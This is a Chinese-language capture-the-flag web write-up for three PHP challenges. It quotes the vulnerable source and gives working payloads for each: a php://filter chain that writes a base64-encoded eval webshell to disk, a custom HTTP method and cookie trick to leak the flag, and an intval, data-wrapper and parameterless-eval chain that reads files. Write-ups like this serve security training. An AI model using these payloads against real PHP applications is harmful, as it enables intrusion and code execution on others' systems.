include

源码

<?php
error_reporting(0);
$a=$_GET[‘a‘];
$b=$_GET[‘b‘];
$c=$_POST[‘c‘];
if(!isset($b)){
    highlight_file(__FILE__);
}
function check_out($x){
    str_replace("data","???",$x);
    str_replace("zip","???",$x);
    str_replace("zlib","???",$x);
    str_replace("file","???",$x);
    str_replace("rot13","???",$x);
}
if($array[++$a]=1){
    if($array[]=1){
        echo "Come on!";
    }else{
        echo "Good,you have already solve the first problem";
        check_out($b);
        file_put_contents($b,"<?php die(‘Victory is in sight‘);?>".$c);
    }* 
}
?>

• 第一层绕过 数组溢出绕过 由于自增

payload:a=9223372036854775806

• 第二层绕过 filter协议 写文件 由于代码处有php标签 所以要先去除

payload:b=php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php

• 第三层 base64编码写入

c=PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=

Hs.com

抓包看到提示 Allowed-Request-Method: HS

用HS方法访问看到源码

 <?php error_reporting(0); $fake_data = $_GET[‘innerspace‘]; $data = $_REQUEST[‘innerspace‘]; if ($_SERVER[‘REQUEST_METHOD‘] === "HS") {   if (isset($data)) {     if ($data === "mssctf" && $data !== $fake_data) {       include_once "flag.php";       echo $flag;     } else {       echo "My house is pretty big.";     }   } else {     highlight_file("index.php");   } } else {   header(‘HTTP/1.1 405 Something Goes Wrong‘);   header(‘Allowed-Request-Method: HS‘); } 

可以看到$_GET[‘innerspace‘]和$_REQUEST[‘innerspace‘]

if条件$data=mssctf&data!$fake_data即可

直接将GET方法改为HS 方法后 传入cookie:innerspace=mssctf

$fake_data值为空

$data值为mssctf

即可出flag

baby php

远古考点

<?php
error_reporting(0);
highlight_file(__FILE__);

$mss1 = $_POST[‘level1‘];
$mss2 = $_POST[‘level2‘];
$mss3 = $_POST[‘level3‘];

if (intval($mss1) < 2021 && intval($mss1 + 2) > 2022) {

    $mss4 = file_get_contents($mss2,‘r‘);
    if ($mss4 === "mssCTF is interesting!") {
        
        if (!preg_match("/[0-9]|\`|\^|\\$|\*|\%|\~|\+|\{|\}|\‘|\\\"|\,|\<|\>|\.|\/|\?/i", $mss3)) {
            echo "Regex is so wonderful!";
            echo "<br/>";
            eval($mss3);
        }

        else {
            echo "Success is near!";
            echo "<br/>";
        }
    }

    else {
        echo "Do you like PHP?";
        echo "<br/>";
    }
}

else {
    echo "Level1 is a babe trick,try again!";
    echo "<br/>";
}

• intval()科学计数法绕过

payload:level1=1e10

• file_get_contents()绕过

用data协议绕过

payload:level2=data:,mssCTF%20is%20interesting!

• 第三个考查无参数rce

payload: 先用var_dump(scandir(current(localeconv())));查看flag在第几个

随后readfile(next(array_reverse(scandir(current(localeconv())))));进行查看flag.php

Mssctf WEB wp